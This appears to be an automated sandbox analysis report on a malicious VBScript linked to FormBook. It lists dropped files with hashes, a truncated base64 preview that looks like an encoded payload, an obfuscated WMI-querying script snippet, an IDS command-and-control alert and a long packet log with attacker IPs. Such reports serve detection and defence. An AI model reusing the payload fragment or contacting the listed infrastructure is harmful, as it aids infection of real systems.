                                                                          Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):64
                                                                          Entropy (8bit):1.1940658735648508
                                                                          Encrypted:false
                                                                          SSDEEP:3:Nlllulbnolz:NllUc
                                                                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                          Malicious:false
                                                                          Preview:@...e................................................@..........
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Windows\SysWOW64\AtBroker.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                          Category:dropped
                                                                          Size (bytes):196608
                                                                          Entropy (8bit):1.121297215059106
                                                                          Encrypted:false
                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):405964
                                                                          Entropy (8bit):5.98341777007525
                                                                          Encrypted:false
                                                                          SSDEEP:6144:lDPEOc3IUXDD6gaQddCXe3s/Zf9EPlr+2H4q37jNpBTmbMeADJCW6KZMTh2/lXbc:hRLUx+4MTorlH4izpoWKhTh2pJ8vkdw
                                                                          MD5:9F3C7BBA76488E8EC589DCFC8B410907
                                                                          SHA1:208E762381933DC1C479CB66D81DC184F9D050FC
                                                                          SHA-256:2A8A5067E62EE22F24F9C4A880BF4C0B2D2D41862744956206EC060C1AA272D7
                                                                          SHA-512:DFC61DF8F4A18E045A651E20170DAF554958CAA4F6ECCF91B8959F290F6D78A270D106B08731EF71B8AC0B8C86681077A19F788516EA26DE52D90EF0170BB709
                                                                          Malicious:false
                                                                          Preview:6wIhgOsCg1i75T8bAOsCE27rAmsbA1wkBOsC04XrAkBfuXcfxLtxAZtxAZuB8cjL8mxxAZtxAZuB6b/UNtfrAnvccQGbcQGb6wKgFLpfi1jocQGb6wJ9b3EBm+sCL+wxyusCI9FxAZuJFAvrAv+PcQGb0eJxAZtxAZuDwQTrAoMu6wJVK4H528KNA3zLcQGb6wISV4tEJATrAvbxcQGbicPrAteY6wIKgoHDABXDAHEBm+sCq+a6WQkXSOsCC1dxAZuBwlCafL9xAZvrArABgeqpo5MHcQGb6wLeznEBm+sCvD1xAZtxAZuLDBDrAiyGcQGbiQwTcQGbcQGbQnEBm+sCA2KB+rA+BAB11+sCoTjrAo6/iVwkDHEBm3EBm4HtAAMAAHEBm+sCzr+LVCQI6wJEK+sCfR+LfCQE6wI+bXEBm4nrcQGbcQGbgcOcAAAA6wJWjnEBm1NxAZtxAZtqQHEBm3EBm4nr6wLzg+sC2qTHgwABAAAAEKwDcQGbcQGbgcMAAQAAcQGb6wIxOFNxAZvrAuBxietxAZvrAqdwibsEAQAAcQGb6wIY/IHDBAEAAHEBm3EBm1NxAZvrAnewav/rApMS6wIa64PCBesCpALrAsc2MfbrAlm/cQGbMclxAZvrAvVwixrrArLZ6wJ6A0HrAj6u6wKX9TkcCnXycQGbcQGbRusCIBlxAZuAfAr7uHXdcQGbcQGbi0QK/OsCDsHrAk8NKfDrAqX46wIw3v/S6wL2pnEBm7qwPgQA6wKXqusC7o4xwOsC9dLrAthbi3wkDHEBm+sCyY+BNAdCvhxi6wLu7usCuoKDwARxAZvrAsFjOdB14+sCO6NxAZuJ++sCSUhxAZv/1+sCDbDrAhKGJIfE66c3qVC9QePcKieBysNIiyyp5p2klPauIsNQyX9rjzWWyQsunb1BmasXN/nbbik65sNPm3P2kZ2jMuzpAcJB9+ODQzoasjvMWpJ5WG9CLuGJj9jro9n9nSZP
                                                                          File type:ASCII text, with CRLF line terminators
                                                                          Entropy (8bit):5.316918025817349
                                                                          TrID:
                                                                            File name:FTG_PD_04024024001.vbs
                                                                            File size:122'750 bytes
                                                                            MD5:0d167ef616c14b868472f78d1195fdf3
                                                                            SHA1:d203ebbb35564dd406590d84b4c73cf310104634
                                                                            SHA256:6c4ed597f8ac1bf79f88afe6704c467c3629247824efb12ab35a72fd52176e84
                                                                            SHA512:22e84d8fb22d43c2453973d4b5be55b6f5af907fc00d7ebaf29538e171523a80ecc5f8a17edfad926f15ecab52b301b9c47508807d30330b463d776505da39c4
                                                                            SSDEEP:3072:yI9rv8awfhzzoNWI1Qe3OjVK3EyQaeCamHaXQyKpgRpYCw+YtavFUJRocC7DBTzl:yWrvWhzzUn1Qe3OjVK3EyQvCamHaXQyl
                                                                            TLSH:70C3E6A3CF0A36185F8E2FD1AC69C95145F751B27121243899EDE6EDA083FAC91FCC46
                                                                            File Content Preview:....Kiwitrteninformations = Command ......Set Intensionally = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")..On error resume next......on error resume next....Set hiation = Intensionally.ExecQuery("Select * from Win32_Service")....
                                                                            Icon Hash:68d69b8f86ab9a86
                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                            04/25/24-11:04:26.578950TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971780192.168.2.547.91.88.207
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 25, 2024 11:02:59.927120924 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.129467964 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.129559994 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.130109072 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.332431078 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.333404064 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.333421946 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.333453894 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.333472967 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.333491087 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.333494902 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.333539009 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.333544970 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.333609104 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.333616018 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.333642960 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.333662987 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.333705902 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.333734035 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.333777905 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.535932064 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.535952091 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.535975933 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.535993099 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536010981 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536040068 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536057949 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536072016 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.536108017 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536123991 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536139011 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.536143064 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536159039 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.536190033 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.536231041 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536247969 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536314964 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.536433935 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536511898 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536528111 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536570072 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.536597013 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536613941 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536629915 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536660910 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.536696911 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.536701918 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536736012 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.536783934 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.738370895 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.738396883 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.738415003 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.738431931 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.738452911 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.738504887 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.738522053 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.738539934 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.738564968 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.738600969 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.738648891 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.738648891 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.738668919 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.738759041 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.739305019 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739321947 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739339113 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739355087 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739372015 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739379883 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.739419937 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.739458084 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739479065 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739521980 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.739536047 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739578962 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.739600897 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739618063 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739664078 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.739680052 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739727020 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739744902 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739803076 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.739815950 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739834070 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739864111 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.739886045 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739902020 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739917994 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739934921 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739939928 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.739974022 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.739985943 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.740021944 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.740034103 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.740077972 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.740093946 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.740118980 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.740144014 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.740155935 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.740174055 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.740185022 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.740190029 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.740219116 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.740223885 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.740269899 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.740284920 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.740297079 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.740355015 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.940923929 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.940958977 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.940974951 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.940993071 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941009045 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941029072 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941040993 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.941046000 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941063881 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941081047 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941097975 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941118956 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.941148043 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.941164017 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941206932 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941239119 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941268921 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.941313028 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941354990 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.941395044 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941446066 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941497087 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.941508055 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941539049 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941591024 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.941629887 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941648006 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941687107 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941695929 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.941745996 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941762924 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941792965 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941809893 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.941834927 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941848040 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.941853046 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941903114 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.941921949 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941939116 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941955090 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.941982031 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.941986084 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.942017078 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.942047119 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.942084074 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.942130089 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.942152977 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.942173004 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.942271948 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.944758892 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.944789886 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.944843054 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.945379972 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945420980 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945470095 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.945482969 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945557117 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945575953 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945612907 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.945648909 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945667028 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945683956 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945710897 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945719004 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.945758104 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945775032 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945780039 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.945811033 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.945821047 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945852041 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945872068 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.945890903 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945940971 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.945941925 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.945974112 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946007967 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946021080 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.946059942 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946077108 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946125984 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.946135044 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946152925 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946170092 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946187019 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946197033 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.946218967 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946237087 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946238995 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.946269035 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946293116 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.946316004 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946326017 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.946362019 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946377993 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946408987 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946430922 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.946450949 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946485043 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.946508884 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946526051 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946557045 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946561098 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.946600914 CEST4970680192.168.2.587.121.105.163
                                                                            Apr 25, 2024 11:03:00.946607113 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946676970 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946692944 CEST804970687.121.105.163192.168.2.5
                                                                            Apr 25, 2024 11:03:00.946710110 CEST804970687.121.105.163192.168.2.5
